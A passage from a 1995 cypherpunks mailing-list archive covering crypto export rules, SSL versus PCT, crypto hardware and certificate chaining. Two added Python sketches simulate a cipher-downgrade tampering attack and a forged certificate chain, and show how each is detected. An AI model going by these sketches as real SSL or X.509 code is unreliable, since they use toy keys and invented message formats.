The t-shirt is currently publicly available from Joel Furr, at a list
price of $12.36, including shipping and handling. More ordering
information is available on the Internet World Wide Web at
http://www.danger.com/ad-perl.html .

CURRENT USE

The t-shirt is intended as an implementation of the RSA cipher for
those who wish to incorporate encryption into their communications.
The small size of the implementation makes it particularly useful in
contexts in which existing cryptographic infrastructure is not
available.

Examples of the commercial use of the cipher implemented include
integrity verification, authentication and confidentiality of
electronic mail, computer software, voice, video and other information
in digitized form. For example, the cipher is used either by itself
for email privacy, and also as a component in other protocols that
provide privacy and authentication, including PGP (Pretty Good
Privacy), S/MIME (Secure Multipurpose Internet Mail Extensions), MOSS
(MIME Object Security Services), PEM (Privacy Enhanced Mail), and SSL
(Secure Sockets Layer).

The uses of this cipher have not changed significantly over time,
although their popularity has grown substantially. Their present
military utility is unknown, except that it is believed that the
algorithm is not approved for the protection of US classified
information.

SPECIAL CHARACTERISTICS

There are no military standards or specifications that this t-shirt is
designed to meet. There are no special characteristics of the t-shirt,
including no radiation-hardening, no ballistic protection, no hard
points (the t-shirt is only available in soft 100% cotton), no TEMPEST
capability, no thermal and no infrared signature reduction capability
(in excess of that provided by a typical black cotton t-shirt), no
surveillance, and no intelligence gathering capability. The t-shirt
does not use image intensification tubes.

OTHER INFORMATION

I recommend that this t-shirt be determined to be in the jurisdiction
of the Commerce Department. I believe that it qualifies for the
general license GTDA for General Technical Data to All Destinations,
because it qualifies as "publicly available".

ATTACHMENTS

I have enclosed two copies of the t-shirt, included with the primary
filing of this CJ request.


                                        Sincerely,



                                        Raphael L. Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 1 Oct 95 14:02:34 PDT
To: cypherpunks@toad.com
Subject: N$ SSL vs M$ PCT
Message-ID: <v02120d03ac94b0e71032@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

From: "John Hemming CEO MarketNet"  <JohnHemming@mkn.co.uk>
Date:  Sun, 01 Oct 1995 20:36:31 PM PDT
To: www-buyinfo@allegra.att.com
Mime-Version: 1.0
Subject: N$ SSL vs M$ PCT

Having found that Micro$oft have produced a standards document
about their alternative to SSL I was interested in comparing it to
that written by Net$cape.

The big question in my view is why did they produce a new
proposal is it:

a) Because they have found major flaws in the SSL protocol
and wish to correct these (note the protocol not the implementation)

or is it

b) Because M$ want to "own" the Internet Security Software market
and take the initiative off N$ who, notwithstanding their problems with
implementation, have produced a working system.

My personal view is that b) is the case.

Comparison

I have compared
SSL V3 <draft-hickman-netscape-sl-01.txt>  (available at www.netscape.com)
PCT http://www.microsoft.com/windows/ie/pct.htm <draft-microsoft-PCT-91.txt>
Both have status of Internet Draft.
I have implemented SSL V2 in a browser
(ftp://193.119.26.70/mktnet/pub/horse.zip)
and a server (https://alpha.mkn.co.uk/)
I have not implemented and do not intend implementing PCT

Both SSL V3 and PCT now involve a vast number of different alternatives
for Ciphers most of these alternatives do not help in any practical sense
and I have not compared the lists.

PCT allows for supporting SSL as well by using a bit in the SSL version number
to indicate PCT.  This means that servers can support both protocols. Clients
cannot as the first message is sent by the client and there is no provision for
SSL/PCT negotiation.

Both PCT and SSL start with an initial session (GET or POST in wwwland) which
establishes a master key and allow continuations of that key in later sessions.

M$ use the following arguments in support of PCT:
1. it is simpler.
PCT uses longer messages with more fields in them.  It cuts out the final
SERVER-FINISHED and CLIENT-FINISHED messages.  It puts some of the
data in SSL into other records.  I quite like the verification in the
CLIENT-FINISHED message which means that bad implementations crash out at
that point rather
than putting rubbish into the higher level protocol.  However, I consider that
in essence there is no real difference.  I, therefore, disagree with M$.

2. Message authentication uses different keys to the encryption keys.  How
this helps, apart from making implementation harder, I cannot quite fathom.  We
should not be using this secure channel protocol for proper message
authentication only.  The MAC (Message Authentication Code) is not what I
would use for authentication from a legal and contractual background.  I
prefer Digitally Signed Instructions.

3. They say there is a security hole in SSL's client authentication.
When the initial session establishing a session key uses (for example) 40 bit
encryption. It does mean that subsequent sessions are also essentially just as
insecure.  This is the case for PCT and SSL.  However, client authentication
in SSL uses a digital signature using the client's private key.  To get hold of
this requires something more than simply being man in the middle.  I think M$
are well out of order on this one.

4. They introduce a verify prelude field to make sure that the cipher type
and other negotiations have not been tampered with.  I suppose this is a
fair if disingenuous point.  If a "man in the middle" is tampering with your
negotiations to make sure that you use a low level of encryption so that it
can be cracked then your implementations should not be using such
crippleware and cypherpunks will have cracked it ages ago.

There is a point that should be made that servers and clients should really
indicate the encryption cipher being used.  Both my client and server do.

So in essence M$ make 4 arguments. Two are IMHO wrong.  One is
irrelevant from a commercial perspective and the other one does not matter.

In the end N$'s version is working.  M$ are probably coding like mad.

The final formula to determine the result may be

if (M$>N$) SSL+=PCT;

where M$ and N$ are measured in US Dollars.

(MarketNet is a UK company independent of both M$ and N$ although
N$ were helpful in debugging the interoperability of my early essays into
SSL for which I am grateful.)

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<
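
[Added example, not part of the forwarded post and not the SSL or PCT wire format: a simplified handshake showing what points 2 and 4 above describe, a MAC key derived separately from the encryption key and a check over the negotiation messages that exposes an in-transit change to the cipher list. The cipher names, message layout, function names and the pre-shared master secret are assumptions made for the illustration.]

```python
import hashlib
import hmac
import os

# Constructed cipher names and strengths in bits; not real SSL/PCT code points.
STRENGTH = {"RC4-128": 128, "DES-56": 56, "RC4-40": 40}


def encode_hello(tag, ciphers, nonce):
    """Serialise a hello as tag|cipher,cipher,...|hex-nonce (made-up layout)."""
    return b"|".join([tag, ",".join(ciphers).encode(), nonce.hex().encode()])


def decode_hello(msg):
    _tag, ciphers, nonce = msg.split(b"|")
    return ciphers.decode().split(","), bytes.fromhex(nonce.decode())


def derive_keys(master, client_nonce, server_nonce):
    """Derive distinct encryption and MAC keys from one master secret."""
    seed = client_nonce + server_nonce
    enc_key = hmac.new(master, b"encryption" + seed, hashlib.sha256).digest()
    mac_key = hmac.new(master, b"authentication" + seed, hashlib.sha256).digest()
    return enc_key, mac_key


def prelude_mac(mac_key, client_hello, server_hello):
    """MAC over the negotiation messages exactly as one side saw them."""
    return hmac.new(mac_key, client_hello + server_hello, hashlib.sha256).digest()


def strip_to_weakest(client_hello):
    """Simulated in-transit edit: only the weakest offered cipher survives."""
    ciphers, nonce = decode_hello(client_hello)
    return encode_hello(b"CH", [min(ciphers, key=STRENGTH.get)], nonce)


def run_handshake(in_transit=lambda msg: msg, check_prelude=True):
    # Assumption: the master secret was already sent under the server's
    # public key; that exchange is outside this sketch.
    master = os.urandom(32)

    # Client offers its ciphers; the message may be altered on the wire.
    sent = encode_hello(b"CH", ["RC4-128", "DES-56", "RC4-40"], os.urandom(16))
    received = in_transit(sent)

    # Server picks the strongest cipher it sees offered.
    offered, client_nonce = decode_hello(received)
    chosen = max((c for c in offered if c in STRENGTH), key=STRENGTH.get)
    server_hello = encode_hello(b"SH", [chosen], os.urandom(16))
    _, server_nonce = decode_hello(server_hello)

    # Both sides derive the same keys; the client MACs what it SENT,
    # the server recomputes the MAC over what it RECEIVED.
    _enc_key, mac_key = derive_keys(master, client_nonce, server_nonce)
    client_tag = prelude_mac(mac_key, sent, server_hello)
    expected = prelude_mac(mac_key, received, server_hello)
    accepted = (not check_prelude) or hmac.compare_digest(client_tag, expected)
    return {"cipher": chosen, "bits": STRENGTH[chosen], "accepted": accepted}


if __name__ == "__main__":
    print("untouched          :", run_handshake())
    print("altered, no check  :", run_handshake(strip_to_weakest, check_prelude=False))
    print("altered, with check:", run_handshake(strip_to_weakest))
```
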






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sun, 1 Oct 95 18:54:35 PDT
To: norm@netcom.com (Norman Hardy)
Subject: Crypto hardware summary
Message-ID: <v02120d01ac94f4da72ff@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



[A summary of my points on crypto hardware follows my response
to Norm.]

Norm Hardy writes:
>What key length are you using that takes 3.2 sec?
>The DSP can operate concurrently with other processing, giving an
>improvement greater than 3.2/1.9.

I'm aware of this -- I was using Tim's pessimistic estimate
of improvement... to make it clearer for those who didn't read
his post, I should have said, "Even if the reduction is only from
3.2 seconds to 1.9 seconds, it would be significant for someone
running a server." I'm aware that with DSPs you can get rather
better results; an ASIC will get you another order of magnitude
over DSPs (assuming equivalent price -- the Moto 96K DSP is a real
gem for bignum math but is many times more expensive than an
equally effective ASIC. They were also having serious availability
problems last year...)

Here is a summary of my points on this subject to date, for those
who haven't been following this discussion:

  o Using coprocessors of any sort to achieve speed in cryptography
    operations is probably not justified for end users; it is almost
    always justified for servers with a high volume of transactions
    requiring public key authentication or encryption.

  o DSPs are not really as attractive as general purpose CPUs for
    accelerating cryptography for high-volume servers. Although DSP
    architecture is somewhat more conducive to bignum math, the benefits
    seem to be offset by the wide availability of standard CPUs and
    tools for programming them. If a large increase in speed is desired
    without resorting to single-purpose hardware, I recommend using
    a large number of standard CPUs as coprocessors, rather than an
    equivalent approach with DSPs. (The fact that uint multiplies
    on a 486 take multiple clock cycles is offset by the higher
    internal clock speeds and lower cost of the 486. You can point out
    super-fast DSPs, and I can point out their super-large price tags,
    more expensive tools, and substantially more expensive programmers.)

  o The real way to go for speed is ASICs, which give you much better
    bang for the buck, although they have disadvantages, including
    problems of export, inflexibility, etc. My favorite RSA chip board
    so far is from Uti-Maco in Belgium, which is a tamper-resistant
    add-in card with an 8086-compatible controller and a custom BIOS
    for doing RSA and DES operations in h/w, which allows s/w to be
    developed using standard tools. (I have ranted at length about the
    complications involved with _Belgian_ crypto export controls,
    which seem to stem from NATO pressure and US desire to balkanize
    the market for cryptography products.)

  o People doing valuable transactions on servers are going to want
    tamper resistance and hardware-key security. This is more important
    in some cases than speed, although speed is also very important.

  o People running cryptography-based transaction clients on their PCs are
    going to learn, one way or another, that having valuable secret keys
    on their hard disks is not a great idea. This, not speed, is the
    primary motivation for consumer-oriented cryptography hardware.
    People want their keys and financial transactions on secure, removable,
    non-mechanical media. Products that provide this are just starting
    to come on the market, notably from National Semiconductor and
    Telequip.

  o End-user software will need to be written to allow, but not require,
    external cryptography devices. Consequently, consumer software that
    performs valuable transactions still needs to be written in an
    extremely paranoid fashion with respect to the reliability and
    security of the underlying hardware.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Sun, 1 Oct 95 10:51:13 PDT
To: cypherpunks@toad.com
Subject: Re: Europe
Message-ID: <Pine.HPP.3.91.951001183508.11746A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain



Perry M. wrote:

> I was wondering if the Europeans had an equivalent of EPIC or EFF
> lobbying against crypto restrictions there, given the disturbing news
> a week or so ago.

Europe, in this regard, is still mostly every country on its own.
Lobbying in Brussels is not for mortals, and decisions are in
closed chambers anyway (the Commission; inter-governmental level).

Sweden: The authorities have not yet said anything at all about
where they stand in the GAK controversy. Probably very few have
heard about it. A national IT-Commission was formed by the former
government a year and a half ago, then they lost the elections
a year ago and the new IT-Commission (yes, very partisan) has
just settled down. The only thing that has come up on a public
(television) level is demands from the police of access to
decoded GSM traffic, which I believe is under implementation
now (the obstacle has mainly been who is going to pay for the
software updates of the GSM nodes). Sweden has rather strict
rules for wiretapping (at least officially) and there is no
public pressure for any change in this. On the local networks
(the swnet.* newsgroups and Fidonet meetings) there is some
discussion of crypto vs computer networking but only in
obscure niches. If/when GAK will be proposed this might hopefully
change.

I think the basic difference USA vs Sweden in this regard is a
time delay of some years. We have lots of Internet nodes per
capita (more than in the US, they say) but the net is still
largely run by engineers (if only that could last!) and net
awareness is rare above the age of 30 (i.e. among those who
have a say).

The European Council document (posted here in full by Dave
Banisar) is certainly worrying. Of course, I've tried to
spread it on the Swedish speaking networks 



For information on Swedish net censorship there is a 'mini-CAF' at:

http://www.dtek.chalmers.se/~d1dd/censorship/

PS
Perry, what was your impression of the Swedes you met at the
IETF meeting in Stockholm last July? I guess they were so
happy about the new 34 Mbit/s connection to the New World
that they forgot about the rest?

Mats
*********************************************************
For a searchable list of products in the Swedish national
monopoly liquor-shops, see:

http://lupus.physchem.kth.se/systemet.html










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sun, 1 Oct 95 15:49:06 PDT
To: cypherpunks@toad.com
Subject: I am the anti-Ch<fnord>
Message-ID: <9510012248.AA07906@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


I got some email responses to my SAIC info.  Here's a little more fun on
a Sunday evening.  All the statements below are true.

Among the first two (possibly the very first two) MX records for not-connected
sites desiring Internet-style names were:  att.com and mirror.tmc.com.
That is, the phone company, and a small subsidiary of the Times-Mirror
corporation.  It was from mirror that mod.sources/comp.sources.unix was
moderated -- for many years, the only source of free software available
to Usenet.

Seismo was the forwarder for both ATT and TMC (via special-case lines in
Rick's sendmail.cf file).  ATT, through ihnp4 in Chicago (site of the
Democratic convention), vied with seismo for the we'll-call-anyone philosophy
that a few sugar daddies (er, backbone) sites had that kept uucp Email
and Usenet running back then.  Under the auspices of the curiously-named
"Network Action Central" many ATT sites did dialup UUCP to mirror on a
daily basis, ostensibly to pick up mod.sources.

I was the administrator of mirror.tmc.com; the tmc.com domain "conflicted"
with tmc.edu, the Texas Medical Center.  The NIC back then asked me to
ask tmc.edu to "reconsider."  Do you know where their book depository
is/was?

Rick started Alternet, now "Shared" with Microsoft.  Unlike Sprint and
MCI, ATT "curiously" decided to *not* become a network service provider,
but instead allied with BBN and sells their technology, equipment and
services.  I worked at BBN for five years, in the same department that
became BBNPlanet, the global ISP and ATT's partner.  I also wrote INN,
which now handles essentially all the Usenet traffic in the world.

So who cares about the latest media mega-deal of Eisner or Time-Warner-Turner?
We already control the Internet media; the Web is merely~~~~#@

NO CARRIER




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sun, 1 Oct 95 17:33:58 PDT
To: cypherpunks@toad.com
Subject: Re: Kerberos
Message-ID: <9510020033.AA08263@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>From: "David J. Bianco" <bianco@itribe.net>
Date: Sun, 24 Sep 1995 16:32:30 -0400

>The Open Software Foundation's Distributed Computing Environment has the
>concept of a central security registry (which is currently based on
>Kerberos).  I haven't delved too deeply into them, but the OSF website has
>some DCE RFCs about adding public key capabilities to the registry.  They
>should be off the OSF home page somewhere at <http://www.osf.org>.

Sort of.  The DCE registry isn't really based on Kerberos.  Rather, DCE
uses Kerberos code to do its private-key stuff.  We're planning on adding
the ability to use public key to get initial tickets to the security server.
Outside of integration with other security domains, this means that the
security server no longer needs to store everyone's private key, reducing
exposure if it's been cracked.

If anyone wants more details on how current or planned DCE security,
drop me a line.  Perhaps some of the other folks on this list who also know
about it will speak up, too.
	/r$, DCE whipping boy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Sun, 1 Oct 95 13:33:37 PDT
To: cypherpunks@toad.com
Subject: Re: NetScape's dependence upon RSA down for the count!
In-Reply-To: <9510010446.AA11983@dmsd.com>
Message-ID: <44mtu4$59h@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <9510010446.AA11983@dmsd.com>, jbass@dmsd.com (John L. Bass) writes:
> Another is since the clients are often distributed
> over the net, that another filter is installed recognize clients and alter
> them on the fly to avoid the client/filter problem in the future.

  This is kind of silly.  If someone can patch the binary on the fly as
you are downloading it, then all is lost, since they could just patch
it to send them copies of any information they wanted.

> Another tack is based on getting very close to the server (in a bridge or
> router in the direct path to the server) in which the filter might actually
> be able to get the get valid certificates signed in the servers name, while
> eating the real requests.

  I really don't understand what you are saying here.  Do you mean that
you could intercept a real server's certificate request, and substitute
your own private key, and then intercept the response?  This could be
easily detected by the CA and the server operator, and I think is just
a policy issue for the CA.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Sun, 1 Oct 95 13:44:28 PDT
To: cypherpunks@toad.com
Subject: Re: NetScape's dependence upon RSA down for the count!
In-Reply-To: <199510010812.BAA11516@ix4.ix.netcom.com>
Message-ID: <44muie$59h@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199510010812.BAA11516@ix4.ix.netcom.com>, stewarts@ix.netcom.com (Bill Stewart) writes:
> Or hack the Web of Trust used to verify the server's identity.
> It _is_ still a Web of Trust even if it's a fascistly-hierarchical tree;
> as long as it's possible to get a certificate without heavy contractual
> obligations, you can hack it, since the software has no way to check,
> now that Netscape is being nice and open and allowing non-Verisign certs.
> Remember that anybody can be a CA, and keys can be signed by multiple CAs.
> 
>         Verisign Business CA signs Carol's Certification Consultants' key.
>         Carol signs Bob's Better Browser Business's key.  
>         Bob runs a server, selling really cool web tools.
>         Verisign Business CA signs Moriarty's Mallet Makers' key.
>         Moriarty signs Mr. X's persona key (trust us.)
>         Mr. X makes a key called Bob's Better Browser Business,
>         looking suspiciously like the real thing, only it's
>         signed by Mr. X, and nobody bothered telling Bob about it.
> 
>         Alice, using Netscape, encounters http://www.Bob'sBetterBrowser.com/,
>         and decides to order a Better Browser.  She gets Bob's public key
>         and X.509 certificates by pressing a button, and receives a key
>         and a pile of certs.  Since it's not a secure session yet, is Mr. X
>         intercepting them and sending her _his_ key and cert for "Bob" and his
>         persona key with cert from Moriarty and his key and cert from Verisign?
>         
>         So Mr. X rips off Alice and/or Bob somewhere here, and Alice decides to sue
>         Bob, who says "Hey, that's not my key, see my real set of certs",
>         so they go off after Mr. X, who they can't find, and then go after
>         Moriarty, who says "Hey, it's just a persona certificate; all I
>         guaranteed was that I didn't sign more than one with the same name on it",
>         which in fact appears to be true, and while after one case you can't 
>         be sure that there really wasn't a Mr. X somewhere, if three or four
>         people start walking in saying Mr. X ripped them off using a key
>         that Moriarty signed, maybe somebody'll think it's a movement...

  You are making a lot of assumptions here.  Let's say that the browser
software is allowing certificate chaining (browser traverses certificate
issuers until it finds one it trusts, then accepts the entire chain).
There could be an attribute in the certificate that indicates whether
the issuer is certifying it to be a subordinate CA.  Presumably when
Moriarty signs a persona certificate, it does not have this attribute.

> Now, X.509 certs don't limit themselves to hierarchical or Web use, and most
> advice on using them recommends limiting the depth of a tree/web that you're
> willing to trust.  Unfortunately, X.509 certs don't even have a comment field,
> much less a standardized "how much do you trust this person you're signing"
> field,
> though I suppose you can cram a bit into the X.400/500-style name formats.

  X509 version 3 does support arbitrary extensions.  We are making use of
this feature in Netscape Navigator 2.0.  Giving certificates attributes
such as "how was their identity verified" and "what operations are they
certified for" is an obvious application of this.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.
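
[Added example, not part of the original message and not Netscape's code: the chaining rule discussed above, run against the Carol/Bob and Moriarty/Mr. X chains from the quoted scenario. The boolean `is_ca` stands in for the "certified to be a subordinate CA" attribute (X.509 v3 later standardised this as the basicConstraints extension); the certificate layout, the toy textbook-RSA keys, the function names and the assumption that Verisign marks both Carol and Moriarty as CAs are all constructed for the illustration.]

```python
import hashlib
from dataclasses import dataclass

E = 65537
VERISIGN, CAROL = "Verisign Business CA", "Carol's Certification Consultants"
MORIARTY, MR_X = "Moriarty's Mallet Makers", "Mr. X"
BOB = "Bob's Better Browser Business"


def make_key(a, b):
    """Textbook RSA from Mersenne primes 2**a-1 and 2**b-1: toy keys, no padding."""
    p, q = 2**a - 1, 2**b - 1
    return {"n": p * q, "e": E, "d": pow(E, -1, (p - 1) * (q - 1))}


@dataclass
class Cert:
    subject: str
    issuer: str
    n: int        # subject's public modulus
    e: int        # subject's public exponent
    is_ca: bool   # hypothetical "may act as a subordinate CA" attribute
    sig: int = 0  # issuer's signature over all fields above

    def digest(self, modulus):
        body = f"{self.subject}|{self.issuer}|{self.n}|{self.e}|{self.is_ca}"
        return int.from_bytes(hashlib.sha256(body.encode()).digest(), "big") % modulus


def issue(subject, subject_key, issuer, issuer_key, is_ca):
    cert = Cert(subject, issuer, subject_key["n"], subject_key["e"], is_ca)
    cert.sig = pow(cert.digest(issuer_key["n"]), issuer_key["d"], issuer_key["n"])
    return cert


def validate_chain(chain, roots, enforce_ca_attribute=True, max_len=None):
    """chain is leaf-first; roots maps a trusted issuer name to its (n, e)."""
    if max_len is not None and len(chain) > max_len:
        return False, "chain too long"
    for i, cert in enumerate(chain):
        if i + 1 < len(chain):
            parent = chain[i + 1]
            if parent.subject != cert.issuer:
                return False, f"{cert.subject}: issuer name mismatch"
            # The check discussed above: a certificate may only vouch for
            # another one if its own issuer marked it as a CA.
            if enforce_ca_attribute and not parent.is_ca:
                return False, f"{parent.subject} is not certified as a CA"
            issuer_n, issuer_e = parent.n, parent.e
        elif cert.issuer in roots:
            issuer_n, issuer_e = roots[cert.issuer]
        else:
            return False, "no trusted root"
        if pow(cert.sig, issuer_e, issuer_n) != cert.digest(issuer_n):
            return False, f"{cert.subject}: bad signature"
    return True, "ok"


def build_scenario():
    """Constructed keys and certificates for the two chains in the quoted text."""
    k = {VERISIGN: make_key(607, 1279), CAROL: make_key(127, 521),
         MORIARTY: make_key(89, 107), MR_X: make_key(31, 61),
         "real Bob": make_key(17, 19), "forged Bob": make_key(7, 13)}
    roots = {VERISIGN: (k[VERISIGN]["n"], E)}
    carol = issue(CAROL, k[CAROL], VERISIGN, k[VERISIGN], is_ca=True)
    bob = issue(BOB, k["real Bob"], CAROL, k[CAROL], is_ca=False)
    moriarty = issue(MORIARTY, k[MORIARTY], VERISIGN, k[VERISIGN], is_ca=True)
    mr_x = issue(MR_X, k[MR_X], MORIARTY, k[MORIARTY], is_ca=False)  # persona cert
    forged = issue(BOB, k["forged Bob"], MR_X, k[MR_X], is_ca=False)
    return roots, [bob, carol], [forged, mr_x, moriarty]


if __name__ == "__main__":
    roots, real, forged = build_scenario()
    print("real chain          :", validate_chain(real, roots))
    print("forged, no CA check :", validate_chain(forged, roots, enforce_ca_attribute=False))
    print("forged, CA check    :", validate_chain(forged, roots))
```

Every signature in the forged chain verifies, so signature checking alone accepts it; the chain is refused only because Mr. X's persona certificate lacks the CA attribute, and the attribute cannot be flipped afterwards because it is covered by Moriarty's signature.
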




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: banisar@epic.org (Dave Banisar)
Date: Sun, 1 Oct 95 17:55:22 PDT
To: Mats Bergstrom <cypherpunks@toad.com
Subject: Re: Europe
Message-ID: <v02130501ac94e5d19a74@[205.177.25.31]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:45 PM 10/1/95, Mats Bergstrom wrote:
>Perry M. wrote:
>
>> I was wondering if the Europeans had an equivalent of EPIC or EFF
>> lobbying against crypto restrictions there, given the disturbing news
>> a week or so ago.
>

There are a few groups in Europe (Privacy International is based in UK,
Argedaten in Austria, CLI in Spain, misc EF-X) but none of them are as
organized as their US counterparts. However, there are also Privacy
Commissions in every country who are also friends to the battle. There was
quite a bit of discussion at their last meeting in Copenhagen last month on
crypto and the Denmark and Ontario, CA Privacy Commissions just came out
with a joint report on crypto that we are working on scanning in and making
available on our web page.

Dave


David Banisar (Banisar@epic.org)             * 202-544-9240 (tel)
Electronic Privacy Information Center      * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301       * HTTP://www.epic.org
Washington, DC 20003                              * ftp/gopher/wais cpsr.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 1 Oct 95 17:59:05 PDT
To: anonymous@freezone.remailer
Subject: Re: SAIC in VA
In-Reply-To: <199509301133.HAA22001@light.lightlink.com>
Message-ID: <Pine.SV4.3.91.951001205636.22845J-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


You left out their subsidiary in Springfield VA. 
Plain Vanilla broadcast engineering  consulting  - mostly....

Alan Horowitz
alanh@infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 1 Oct 95 17:59:24 PDT
To: Raph Levien <raph@CS.Berkeley.EDU>
Subject: Re: CJR for perl-RSA t-shirt
Message-ID: <v02120d03ac94e789fd7a@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>Subject:  Mass Market Software with Encryption - 15 Day Expedited Review
>          Requested
>
>Subject:  Commodity Jurisdiction Request for
>          perl-RSA t-shirt, an encryption program

ROTFL!

I haven't had this much fun since the hogs ate my little brother.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 1 Oct 95 21:42:30 PDT
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Cryptanalysis of RC4 - Preliminary Results (Repeat)
Message-ID: <199510020442.VAA14808@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:39 AM 9/30/95 -0400, Dr. Frederick B. Cohen wrote:
>The problem is that if these keys are weak, there may be many others
>that are also weak.  In fact, by the time we explore all of the
>weaknesses, we may find the system is no longer very strong at all. 

These so-called weak keys are far from weak.

You have a 1 in 64000 chance of reducing the search space by 64000.  
Big deal.

Use 128 bit session keys.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 1 Oct 95 18:46:29 PDT
To: Jon Mittelhauser <jonm@netscape.com>
Subject: Re: Netscape and privacy
In-Reply-To: <44fin4$rdq@tera.mcom.com>
Message-ID: <Pine.SUN.3.91.951001214318.15739I-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


With all respect to you and to Netscape (I am one who thinks that the
Netscape participation on this list has reflected very well on the
participants and the company), I think that the reply "we only collect IP
addresses" is not fully responsive to the issue.  While I recognize that
there are implementations that assign a new IP address to every login, I
understand the current norm to be static IP addresses.  I sure have one. 
Thus, if you keep a file of my IP address, and a fact about that address,
you have a database that can be purchased and correlated with another DB,
which links IP to something else, eg telephone numbers (perhaps from a
contest run on the internet?).  Pretty soon we are at serious
profiling.... 

****   PLEASE NOTE NEW E-MAIL ADDRESS: froomkin@law.miami.edu  *********

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | New address, but it's still just as hot here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 1 Oct 95 18:58:19 PDT
To: Douglas Barnes <cman@communities.com>
Subject: Re: Crypto hardware (was: Using sound cards to accelerate RSA?)
In-Reply-To: <v02120d16ac90fe1bdb12@[199.2.22.120]>
Message-ID: <Pine.SUN.3.91.951001215502.15739M-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 28 Sep 1995, Douglas Barnes wrote:
[...]
> communications problems, their fear of RSA Labs, new Belgian
> export controls they haven't tried to work with yet, and their
> belief that I need a US crypto import license, which I can't persuade
> anyone to admit _exists_.

There is no such animal under US law.  Note however (1) you need export
permission to re-export the import, just as if it was produced here; (2)
the company may have legitimate fears that it may have liability and/or
bad PR with the feds under either US or Belgian law if you attempt a
re-export; (3) For all I know, Belgian law may require some US paper
showing what you will do with the stuff before they are allowed to export
it. 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | New address, but it's still just as hot here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 1 Oct 95 22:00:58 PDT
To: cypherpunks@toad.com
Subject: Restrictions on Munitions _Imports_
Message-ID: <ac94bc7800021004cb78@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:58 AM 10/2/95, Michael Froomkin wrote:
>On Thu, 28 Sep 1995, Douglas Barnes wrote:
>[...]
>> communications problems, their fear of RSA Labs, new Belgian
>> export controls they haven't tried to work with yet, and their
>> belief that I need a US crypto import license, which I can't persuade
>> anyone to admit _exists_.
>
>There is no such animal under US law.  Note however (1) you need export
>permission to re-export the import, just as if it was produced here; (2)

I don't expect that any specific _crypto_ import licenses exist, but
certainly various kinds of _munitions_ import licenses exist (improperly,
in my opinion, of course).

Specifically, importers of guns must have licenses. And not just because of
local laws, as the Feds (U.S. Customs, BATF) get involved in seizures of
ammunition, clips, guns, etc. (A recent case here in the Bay Area involved
